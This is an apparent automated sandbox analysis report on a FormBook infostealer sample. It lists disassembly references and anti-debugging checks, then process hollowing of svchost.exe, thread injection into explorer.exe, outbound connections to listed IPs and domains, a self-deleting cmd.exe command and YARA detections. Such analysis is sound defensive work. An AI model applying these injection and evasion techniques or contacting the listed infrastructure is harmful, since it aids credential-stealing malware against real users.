Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h]	2_2_016DC450
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167BC2C mov eax, dword ptr fs:[00000030h]	2_2_0167BC2C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01714015 mov eax, dword ptr fs:[00000030h]	2_2_01714015
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01714015 mov eax, dword ptr fs:[00000030h]	2_2_01714015
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]	2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]	2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]	2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]	2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]	2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]	2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_017014FB mov eax, dword ptr fs:[00000030h]	2_2_017014FB
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718CD6 mov eax, dword ptr fs:[00000030h]	2_2_01718CD6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov ecx, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016890AF mov eax, dword ptr fs:[00000030h]	2_2_016890AF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167F0BF mov ecx, dword ptr fs:[00000030h]	2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h]	2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h]	2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649080 mov eax, dword ptr fs:[00000030h]	2_2_01649080
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h]	2_2_016C3884
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h]	2_2_016C3884
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165849B mov eax, dword ptr fs:[00000030h]	2_2_0165849B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164DB60 mov ecx, dword ptr fs:[00000030h]	2_2_0164DB60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165FF60 mov eax, dword ptr fs:[00000030h]	2_2_0165FF60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718F6A mov eax, dword ptr fs:[00000030h]	2_2_01718F6A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h]	2_2_01673B7A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h]	2_2_01673B7A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164DB40 mov eax, dword ptr fs:[00000030h]	2_2_0164DB40
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165EF40 mov eax, dword ptr fs:[00000030h]	2_2_0165EF40
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718B58 mov eax, dword ptr fs:[00000030h]	2_2_01718B58
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164F358 mov eax, dword ptr fs:[00000030h]	2_2_0164F358
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h]	2_2_01644F2E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h]	2_2_01644F2E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167E730 mov eax, dword ptr fs:[00000030h]	2_2_0167E730
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h]	2_2_0167A70E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h]	2_2_0167A70E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0170131B mov eax, dword ptr fs:[00000030h]	2_2_0170131B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166F716 mov eax, dword ptr fs:[00000030h]	2_2_0166F716
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171070D mov eax, dword ptr fs:[00000030h]	2_2_0171070D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171070D mov eax, dword ptr fs:[00000030h]	2_2_0171070D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h]	2_2_016DFF10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h]	2_2_016DFF10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016837F5 mov eax, dword ptr fs:[00000030h]	2_2_016837F5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h]	2_2_016C53CA
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h]	2_2_016C53CA
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01715BA5 mov eax, dword ptr fs:[00000030h]	2_2_01715BA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h]	2_2_01651B8F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h]	2_2_01651B8F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FD380 mov ecx, dword ptr fs:[00000030h]	2_2_016FD380
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672397 mov eax, dword ptr fs:[00000030h]	2_2_01672397
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01658794 mov eax, dword ptr fs:[00000030h]	2_2_01658794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167B390 mov eax, dword ptr fs:[00000030h]	2_2_0167B390
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]	2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]	2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]	2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0170138A mov eax, dword ptr fs:[00000030h]	2_2_0170138A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165766D mov eax, dword ptr fs:[00000030h]	2_2_0165766D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h]	2_2_016FB260
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h]	2_2_016FB260
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168927A mov eax, dword ptr fs:[00000030h]	2_2_0168927A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718A62 mov eax, dword ptr fs:[00000030h]	2_2_01718A62
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016D4257 mov eax, dword ptr fs:[00000030h]	2_2_016D4257
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164E620 mov eax, dword ptr fs:[00000030h]	2_2_0164E620
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FFE3F mov eax, dword ptr fs:[00000030h]	2_2_016FFE3F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]	2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]	2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]	2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01678E00 mov eax, dword ptr fs:[00000030h]	2_2_01678E00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01658A0A mov eax, dword ptr fs:[00000030h]	2_2_01658A0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h]	2_2_0164AA16
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h]	2_2_0164AA16
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01663A1C mov eax, dword ptr fs:[00000030h]	2_2_01663A1C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h]	2_2_0167A61C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h]	2_2_0167A61C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672AE4 mov eax, dword ptr fs:[00000030h]	2_2_01672AE4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016716E0 mov ecx, dword ptr fs:[00000030h]	2_2_016716E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016576E2 mov eax, dword ptr fs:[00000030h]	2_2_016576E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718ED6 mov eax, dword ptr fs:[00000030h]	2_2_01718ED6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016736CC mov eax, dword ptr fs:[00000030h]	2_2_016736CC
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672ACB mov eax, dword ptr fs:[00000030h]	2_2_01672ACB
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FFEC0 mov eax, dword ptr fs:[00000030h]	2_2_016FFEC0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01688EC7 mov eax, dword ptr fs:[00000030h]	2_2_01688EC7
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C46A7 mov eax, dword ptr fs:[00000030h]	2_2_016C46A7
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]	2_2_01710EA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]	2_2_01710EA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]	2_2_01710EA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0165AAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h]	2_2_0165AAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167FAB0 mov eax, dword ptr fs:[00000030h]	2_2_0167FAB0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DFE87 mov eax, dword ptr fs:[00000030h]	2_2_016DFE87
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h]	2_2_0167D294
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h]	2_2_0167D294

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Code function: 2_2_01689540 NtReadFile,LdrInitializeThunk,

2_2_01689540

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7F9D5 SetUnhandledExceptionFilter,	0_2_00C7F9D5
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C7F838
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C7FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00C7FBCA
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Code function: 0_2_00C88EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00C88EBD

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.221 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.101.152.161 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nordenergogrup.store
Source: C:\Windows\explorer.exe	Domain query: www.sandstormcase.us

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 350000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Thread register set: target process: 3452	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Thread register set: target process: 3452	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 3452	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"	Jump to behavior

Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000003.00000000.334292418.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304261536.0000000006770000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.324252359.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.260934888.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00C7AF0F

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C7F654 cpuid

0_2_00C7F654

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

0_2_00C7DF1E

Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe

Code function: 0_2_00C6B146 GetVersionExW,

0_2_00C6B146

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
